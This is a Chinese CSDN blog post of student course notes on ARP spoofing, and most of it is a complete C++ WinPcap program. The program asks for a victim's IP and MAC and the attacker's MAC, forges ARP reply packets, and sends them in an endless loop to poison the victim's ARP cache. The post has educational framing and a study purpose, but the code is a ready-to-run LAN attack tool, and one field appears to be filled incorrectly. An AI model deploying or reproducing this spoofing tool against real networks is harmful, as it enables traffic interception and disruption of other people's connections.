学习笔记——C++实现ARP欺骗

最新推荐文章于 2024-05-23 22:44:36 发布
最新推荐文章于 2024-05-23 22:44:36 发布
阅读量5.2k 收藏 38
点赞数 6
分类专栏: 学习笔记 文章标签: winpcap c语言 arp欺骗程序的设计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yy19961124/article/details/73845476
版权

谢谢指正错误

在课设期间,从网上学习了简单的实现ARP欺骗
ARP欺骗的原理很简单:通过不断的向目标发送ARP包,致使目标主机的ARP缓存表中正确的IP映射的是错误的MAC地址

在书上的介绍中,采用了WinPcap的开发包,这样很方便的对网卡进行操作

所以,首先需要安装winpacp,并下载开发者包https://www.winpcap.org/devel.htm

对项目文件属性进行配置
1. 在C++项中附加目录加上winpacp的include
2. 在预处理器中加入WPCAP和HAVE_REMOTE
3. 在链接器常规中加入winpacp的lib路径
4. 在链接器输入中加入Packet.lib,wpcap.lib和ws2_32.lib

以下是根据网上的学习,所实现的代码:

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif

#include <stdio.h>
#include <stdlib.h>   
#include "pcap.h"
#include <string.h>

// DLC Header
#pragma pack (1)//使结构体按1字节方式对齐
typedef struct tagDLCHeader
{
    unsigned char DesMAC[6];//以太网目的mac地址
    unsigned char SrcMAC[6];//以太网源目的mac地址
    unsigned short Ethertype;//帧类型
} DLCHEADER, *PDLCHEADER;

typedef struct tagARPFrame
{
    unsigned short  HW_Type;//硬件类型,2字节,填充0x0001
    unsigned short Prot_Type;//协议的类型,2字节,填充0x0800
    unsigned char HW_Addr_Len;//MAC地址长度,1字节
    unsigned char Prot_Addr_Len;//IP地址长度,1字节
    unsigned short  Opcode;//操作码,2字节,0x0001为请求包,0x0002为应答包
    unsigned char Send_HW_Addr[6];//发送方的MAC地址
    unsigned long Send_Prot_Addr;//发送方的IP地址
    unsigned char Targ_HW_Addr[6];//接受方的MAC地址
    unsigned long Targ_Prot_Addr;//接收方的IP地址
//  unsigned char padding[18];
} ARPFRAME, *PARPFRAME;

// ARP Packet = DLC header + ARP Frame
typedef struct tagARPPacket
{
    DLCHEADER dlcHeader; //以太网头部
    ARPFRAME arpFrame;//arp头部
} ARPPACKET, *PARPPACKET;

#pragma


int mac_str_to_bin(char *str, char *mac)
{
    int i;
    char *s, *e;
    if ((mac == NULL) || (str == NULL))
    {
        return -1;
    }
    s = (char *)str;
    for (i = 0; i < 6; ++i)
    {
        mac[i] = s ? strtoul(s, &e, 16) : 0;
        if (s)
            s = (*e) ? e + 1 : e;
    }
    return 0;
}

//
pcap_t *adhandle;
char errbuf[PCAP_ERRBUF_SIZE];
pcap_if_t *alldevs;
pcap_if_t *d;

pcap_t * init()
{
//  pcap_if_t *alldevs;
//  pcap_if_t *d;
    int inum;
    int i = 0;         //网卡数量
    /* Retrieve the device list */
    //获取当前网卡列表
    if (pcap_findalldevs(&alldevs, errbuf) == -1)
    {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }
    //打印网卡的列表
    for (d = alldevs; d; d = d->next)
    {
        printf("%d. %s", ++i, d->name);
        //如果有网卡就打印出来
        if (d->description)
        {
            printf("(%s)\n ", d->description);
        }
        else
        {
            printf(" (No description available)\n ");
        }

    }
    if (i == 0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return 0;
    }
    printf("Enter the interface number (1-%d):", i);
    scanf_s("%d", &inum, sizeof(int));

    if (inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return 0;
    }
    //跳转到所选择的适配器
    for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++)
        //打开所选的网卡适配器
        if ((adhandle = pcap_open_live(d->name,   //适配器的名称
            65535,                                //捕获的数据包的部分。
            //65535是捕获所有流经的数据包,所有的数据包通过都产生端口
            0,
            1000,                                 //读取超时时间
            errbuf                                //错误缓存
            ))
            == NULL)
        {
            fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
            /* Free the device list */
            pcap_freealldevs(alldevs);
            return 0;
        }



    printf("\nlistening on %s...\n", d->description);
    /* At this point, we don't need any more the device list. Free it */
    //当监控某个网卡适配器后,就释放其他的,因为用不到了
    pcap_freealldevs(alldevs);



    return adhandle;

}

void sendArpPacket(pcap_t * fp, ARPPACKET &ARPPacket)
{
    /* Send down the packet */
    if (pcap_sendpacket(fp,             // Adapter
        (const u_char *)&ARPPacket,     // buffer with the packet
        sizeof(ARPPacket)               // size
        ) != 0)
    {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        printf("send NULL ! \n");
        return;
    }
    else
    {
        //      printf("%d", sizeof(ARPPacket));
        printf("send OK ! \n");
    }

}


ARPPACKET  makeArp(int a){
    ARPPACKET ARPPacket;// 定义ARPPACKET结构体变量
    int arpType;
    struct in_addr s;
    char* srcIP;
    srcIP = (char*)malloc(sizeof(char) * 16);
    char* desIP;
    desIP = (char*)malloc(sizeof(char) * 16);
    char* srcMac;
    srcMac = (char*)malloc(sizeof(char) * 18);
    char* desMac;
    desMac = (char*)malloc(sizeof(char) * 18);
    if (a == 1)
    {
        printf("欺骗a方:\n");
        printf("请输入b方ip地址:");
        scanf_s("%s", srcIP, 16);
        printf("请输入a方ip地址:");
        scanf_s("%s", desIP, 16);
        printf("请输入arp包类型[01:请求  02:应答包][若需攻击则为02]:");
        scanf_s("%d", &arpType, sizeof(int));
        printf("请输入本机mac地址:[格式为ff:ff:ff:ff:ff:ff]");
        scanf("%s", srcMac);
        printf("请输入a方mac地址:[格式为ff:ff:ff:ff:ff:ff]");
        scanf("%s", desMac);
    }
    /*else if(a==2)
    {
    printf("欺骗B方:\n");
    printf("请输入A方IP地址:");
    scanf_s("%s", srcIP, 16);
    printf("请输入B方IP地址:");
    scanf_s("%s", desIP, 16);
    printf("请输入ARP包类型[01:请求  02:应答包][若需攻击则为02]:");
    scanf_s("%d", &arpType, sizeof(int));
    printf("请输入本机MAC地址:[格式为ff:ff:ff:ff:ff:ff]");
    scanf_s("%s", srcMac, 12);
    printf("请输入B方MAC地址:[格式为ff:ff:ff:ff:ff:ff]");
    scanf_s("%s", desMac, 12);
    }*/

    mac_str_to_bin(srcMac, (char*)ARPPacket.dlcHeader.SrcMAC);
    mac_str_to_bin(desMac, (char*)ARPPacket.dlcHeader.DesMAC);

    ARPPacket.dlcHeader.Ethertype = htons((unsigned short)0x0806); // DLC Header的以太网类型ARP包
    ARPPacket.arpFrame.HW_Type = htons((unsigned short)0x0001);
    ARPPacket.arpFrame.Prot_Type = htons((unsigned short)0x0800);
    ARPPacket.arpFrame.HW_Addr_Len = (unsigned char)6;//MAC地址长度
    ARPPacket.arpFrame.Prot_Addr_Len = (unsigned char)4;// IP地址长度
    ARPPacket.arpFrame.Opcode = htons((unsigned short)arpType);//arp包类型
    mac_str_to_bin(srcMac, (char*)ARPPacket.arpFrame.Send_HW_Addr);
    ARPPacket.arpFrame.Send_Prot_Addr = inet_addr(srcIP);// 源IP 
    //  printf("%6.6x \n", ARPPacket.arpFrame.Send_Prot_Addr);
    mac_str_to_bin(srcMac, (char*)ARPPacket.arpFrame.Targ_HW_Addr);
    ARPPacket.arpFrame.Targ_Prot_Addr = inet_addr(desIP);//目的IP
    //  printf("%6.6x \n", ARPPacket.arpFrame.Targ_Prot_Addr);
    return ARPPacket;
}

int main(int argc, char **argv) {

    pcap_t * adhandle = init();

    ARPPACKET ARPPacket_A = makeArp(1);
//  ARPPACKET ARPPacket_B = makeArp(2);
    while (true)
    {
        sendArpPacket(adhandle, ARPPacket_A);       
//      sendArpPacket(adhandle, ARPPacket_B);
        Sleep(500);
//      Sleep(1000);
    }
    pcap_close(adhandle);
    return 0;
}

实现之后的操作结果如图所示:
选择的是应答包

结果在wareshark中抓包,显示如图:
这里是应答包

这次课设,了解了ARP的包结构和使用winpacp的发包与收包工作,同时如何构造ARP包,IP包,UDP包,学习书上对于IP包的分析代码也是很有收获。

醉美遇见你倾城
关注
  • 6
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 16
    评论
专栏目录
c++写的 arp 探测程序
11-19
南开大学 网络作业 arp 探测 C++语言的 控制台程序 双线程
ARP欺骗原理及实现,不看绝对血亏
m0_58269070的博客
04-05 1763
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
C++解析ARP数据包(可选网卡)
retravel的专栏
12-18 3133
转自王柏元的博客C++解析ARP数据包(可选网卡):http://wangbaiyuan.cn/c-resolution-arp-packets.html 在网络通讯时,源主机的应用程序知道目的主机的IP地址和端口号,却不知道目的主机的硬件地址,而数据包首先是被网卡接收到再去处理上层协议的,如果接收到的数据包的硬件地址与本机不符,则直接丢弃。因此在通讯前必须获得目的主机的硬件地址。ARP协议
【C/C++笔试练习】TCP、IP广播、ARP协议、IP路由器、MAC协议、三次握手、TCP/IP、子网划分年、会抽奖、抄送列表
最新发布
Crocodile1006的博客
05-23 864
C/C++笔试练习笔记、TCP、IP广播、ARP协议、IP路由器、MAC协议、三次握手、TCP/IP、子网划分、年会抽奖、抄送列表
C/C++ 获取主机网卡MAC地址
CSDN
11-19 1万+
MAC地址(Media Access Control address),又称为物理地址或硬件地址,是网络适配器(网卡)在制造时被分配的全球唯一的48位地址。这个地址是数据链路层(OSI模型的第二层)的一部分,用于在局域网(LAN)中唯一标识网络设备。获取网卡地址主要用于网络标识和身份验证的目的。MAC地址是一个唯一的硬件地址,通常由网卡的制造商在制造过程中分配。通过获取MAC地址可以判断当前主机的唯一性可以与IP地址绑定并实现网络准入控制。
ARP C++实现源代码
zhongyhc的专栏
06-07 1590
转自:不变hi.baidu.com/wuxiaoming1733/blog/item/f7cebd191cfeb35a43a9ad92.html #ifndef MY_ARP_CHEAT_INCLUDE_H #define MY_ARP_CHEAT_INCLUDE_H //字节对齐必须是1 #pragma pack (1) struct ethernet_head
【网络编程4】网络编程基础-ARP响应(ARP欺骗之中间人攻击)
weixin_30241919的博客
12-17 398
arp欺骗->arp响应 ARP 缓存中毒(ARP欺骗arp传送原理在于主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间。 攻击者可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗arp...
C++基础学习笔记————网课
08-18
个人网课学习笔记
信息奥赛c++学习笔记——贪心算法
01-06
一,算法 在当前状态下找出局部最优解,转化为全局最优解。 二,活动安排问题 1.问题描述:给定n个开区间(ai,bi),在给定范围内尽量选择多个区间,使得这些区间两两没有公共点。 2.算法:按照结束时间bi从小到大...
Solidworks学习笔记——随形变化.docx
07-13
Solidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——...
JBPM学习笔记——流程设计与控制
03-03
火龙果软件工程技术中心 相关资料:《jBPM学习笔记(V3.2环境部署)》《jBPM学习笔记(框架设计简介)》背景本片文章,我们将从业务流程的设计开始,通过带领大家完成一个完整工作流的程序设计,来学习jPDL的使用。...
arp欺骗C++实现
10-15
arp欺骗原理及实现 用c++实现 无界面控制台程序
C++环境下发送ARP
02-07
C++环境下发送arp包的例子,可以获取各个IP的MAC地址。 C++环境下发送arp包的例子,可以获取各个IP的MAC地址。
C/C++手动构造ARP包并发送至网络
热门推荐
Cinux的博客
08-07 1万+
所选题目: 1. 在熟悉ARP协议并了解Winpcap编程的前提下,构造ARP包,选择并打开网卡,将ARP包发送出去。 运行格式:程序名源IP地址目的IP地址目的MAC地址flag 源 IP   目的IP  源MAC  FLAG ( flag=0: ARP请求flag=1: ARP应答)   1.要求及功能 按照题目要求,成功发送ARP包到网络( flag=0: AR
Linux arp命令详解及C/C++代码实现
chen1415886044的博客
03-06 4716
ARP(地址解析协议)是一种网络协议,用于从 IP 地址中找出设备的硬件 (MAC) 地址。当设备想要与本地网络上的其他设备通信时使用它,发送设备使用 ARP 将 IP 地址转换为 MAC 地址。 设备发送一个 ARP 请求消息,其中包含接收设备的 IP 地址。 本地网段上的所有设备都会看到该消息,但只有具有该 IP 地址的设备会使用包含其 MAC 地址的 ARP 回复消息进行响应。 发送设备现在有足够的信息将数据包发送到接收设备。 ARP过程的解释: 假设主机 A 想与主机 B 通信。主机 A 知道主机
linux C++ ARP本地局域网发送及接收
wohendatou的博客
06-20 830
代码 #include <iostream> #include <cstring> #include <unistd.h> #include <netdb.h> #include <errno.h> #include <thread> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include &lt
在Visual Studio上使用C++语言基于WinPcap驱动的ARP欺骗攻击
qq_42012288的博客
08-01 1277
该篇文章仅仅用来了解ARP欺骗攻击的相关知识,用于学习
C/C++ Npcap包实现ARP欺骗
CSDN
08-18 5556
npcap 是Nmap自带的一个数据包处理工具,Nmap底层就是使用这个包进行收发包的,该库,是可以进行二次开发的,不过使用C语言开发费劲,在进行渗透任务时,还是使用Python构建数据包高效,唯一的区别是使用Python的库,可以节约我们寻找数据包结构的时间.
jQuery学习笔记——事件
06-08
好的,关于 jQuery 的事件,我可以和你分享一些学习笔记。 1. 绑定事件 在 jQuery 中,我们可以通过以下方式来绑定事件: ``` $(selector).event(function(){ // 事件处理程序 }) ``` 其中,`selector` 表示要绑定事件的元素,`event` 表示要绑定的事件类型,比如 `click`、`mouseover` 等等。事件处理程序则是在事件触发时要执行的代码块。 2. 多个事件绑定 我们可以通过 `on()` 方法来同时绑定多个事件: ``` $(selector).on({ event1: function(){ // 事件处理程序1 }, event2: function(){ // 事件处理程序2 } }) ``` 这样,当 `event1` 或 `event2` 中任意一个事件触发时,对应的处理程序都会被执行。 3. 解除事件 如果需要解除某个元素的事件处理程序,可以使用 `off()` 方法: ``` $(selector).off(event); ``` 其中,`event` 表示要解除的事件类型。如果不指定事件类型,则会解除该元素上所有的事件处理程序。 4. 事件委托 在 jQuery 中,我们可以使用事件委托来提高性能。事件委托是指将事件绑定到父元素上,而不是绑定到子元素上,然后通过事件冒泡来判断是哪个子元素触发了该事件。这样,当子元素数量较多时,只需要绑定一次事件,就可以监听到所有子元素的事件。 ``` $(selector).on(event, childSelector, function(){ // 事件处理程序 }) ``` 其中,`selector` 表示父元素,`event` 表示要绑定的事件类型,`childSelector` 表示要委托的子元素的选择器,事件处理程序则是在子元素触发事件时要执行的代码块。 以上是 jQuery 中事件的一些基本操作,希望对你有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值